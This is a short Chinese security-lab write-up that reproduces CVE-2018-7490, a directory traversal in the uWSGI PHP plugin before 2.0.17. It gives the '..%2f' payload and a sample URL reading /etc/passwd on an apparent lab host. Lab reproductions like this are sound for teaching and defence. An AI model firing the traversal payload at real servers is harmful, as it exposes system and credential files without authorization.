CVE-2018-7490
漏洞简介:uWSGI是一个Web服务器,它实现了WSGI协议、uwsgi、http等协议。Nginx中HttpUwsgiModule的作用是与uWSGI服务器进行交换。WSGI是一种Web服务器网关接口。它是一个Web服务器(如nginx,uWSGI等服务器)与web应用(如用Flask框架写的程序)通信的一种规范
漏洞概述:uWSGI 2.0.17之前的PHP插件,没有正确的处理DOCUMENT_ROOT检测,导致用户可以通过..%2f来跨越目录,读取或运行DOCUMENT_ROOT目录以外的文件。
影响版本:uWSGI 2.0.17之前的版本
Payload:..%2f..%2f -> %2f为 / 的 url编码
复现
- 访问首页
![图片[1]-【初级】uWSGI 目录穿越-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/09/d2b5ca33bd085219-1024x658.png)
- 输入Payloadhttp://123.58.224.8:32422/..%2f..%2f..%2f/etc/passwd
![图片[2]-【初级】uWSGI 目录穿越-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/09/d2b5ca33bd085309-1024x456.png)
若有收获,就点个赞吧
本文作者:云云
© 版权声明
部分文章采集于互联网,若侵权请联系删除!
THE END
请登录后查看评论内容